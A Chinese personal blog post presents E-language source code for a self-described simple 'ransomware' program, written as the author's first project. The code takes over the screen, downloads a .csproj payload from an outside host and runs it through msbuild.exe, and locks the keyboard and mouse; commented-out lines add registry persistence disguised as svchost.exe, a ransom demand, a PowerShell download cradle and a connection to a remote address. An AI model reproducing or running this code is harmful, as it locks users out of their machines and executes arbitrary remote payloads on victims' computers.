酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

易语言处女作之编写简单的“勒索病毒”

2019-9-14 15:21 作者:酷帥王子 | 易语言网络安全 |

  感谢北京君信安的老总王总,让我认识了公司的小龄技术大拿,今年才19岁,又是渗透又是go语言又是python又是易语言,两个人瞎叨叨的时候,突然萌生我要写个什么程序出来,得知他已经用易语言编程5年之久后,我下定决心要恶补易语言,于是乎就有了写一个简单的“勒索病毒”出来。

.版本 2
.支持库 internet
.支持库 shell

.程序集 窗口程序集_启动窗口

.子程序 __启动窗口_创建完毕

_启动窗口.总在最前 = 真
_启动窗口.左边 = 0
_启动窗口.顶边 = 0
_启动窗口.宽度 = 取屏幕宽度 ()
_启动窗口.高度 = 取屏幕高度 ()
' 信息框 (“当你执行这个程序的时候,你电脑已经被我勒索,你都认识我,除非你给我发个100元的红包,然后我远程帮你结束进程,还有你重启电脑会加密你的硬盘数据,还有一种办法,等执行3500万亿次以后自动结束进程”, 0, “发红包吧,微信号:googlehack,不用加好友验证”, )
' 写注册项 (4, “SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost.exe”, 取运行目录 () + “\” + 取执行文件名 ())
' 写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe”, 取运行目录 () + “\” + 取执行文件名 ())
写到文件 (“c:/windows/temp/sysinfo.csproj”, HTTP读文件 (“http://5kb.org/188.csproj”))
' 运行 (“C:\hamapi.exe 1.1.1.1 443”, 假, )
' 执行 (4, “C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe”, “$client = (new-object System.Net.WebClient).DownloadFile('http://5kb.org/188.csproj', 'd:\188.csproj')”, , )
' 复制文件 (取运行目录 () + “\” + 取执行文件名 (), 取特定目录 () + 取执行文件名 ())
执行 (4, “C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe”, “c:/windows/temp/sysinfo.csproj”, , )

时钟1.时钟周期 = 5000

.子程序 _



.子程序 _时钟1_周期事件

键盘_锁定 ()
鼠标_锁定 ()

文章作者:酷帥王子
文章地址:https://9kb.org:443/post-110.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.